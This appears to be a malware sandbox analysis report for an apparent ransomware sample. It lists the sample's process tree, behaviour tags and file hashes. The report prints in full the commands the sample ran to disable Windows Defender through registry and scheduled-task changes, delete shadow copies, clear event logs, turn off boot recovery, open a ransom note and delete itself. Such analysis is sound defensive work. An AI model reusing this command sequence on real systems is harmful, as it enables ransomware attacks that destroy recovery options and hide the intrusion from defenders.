C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1464
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1156
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:920
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1908
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:952
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1356
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1168
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1112
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1780
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1996
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1892
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1292
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1588
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1120
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1808
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1556
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1108
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2044
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1424
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:976
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:916
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1132
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2032
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1592
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1376
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:840
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:760
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:580
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\Djfk_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1920
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"2⤵
- Deletes itself
PID:156 -
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:1496
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD596ad57ef6f7c434f4642a95f782e1ffa
SHA176b519f4c0d1b998e0c37ff3ffa8dc0024449eaa
SHA256a1e2a8b6650198527b5066285ca32eaa06e583a282fa69511805979bb54560f1
SHA512ba0ca31bc36c0d4e0868906a1f8576e902580286a68b2f137ea89a8c08f11c4d3fbce67e7327514ad0b37b6c3bdb7a6636742be99068bd661eaa70cbe41539c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5babaac0ddeabbadb4837b05b5856fee2
SHA12243bc4c927aede79c981267d44970f0d7f6e495
SHA256b8cc4831814c040575d0a5d8dc753acf9794fa9720518079500e258f672a7860
SHA5120579420756012ef8206c4eec579f510c1d08e06f16ed83f16539fa08c880976f8262713ab74db4a9769cf8586cfcc81ea52cc6a31aec3e590d3320a81587120f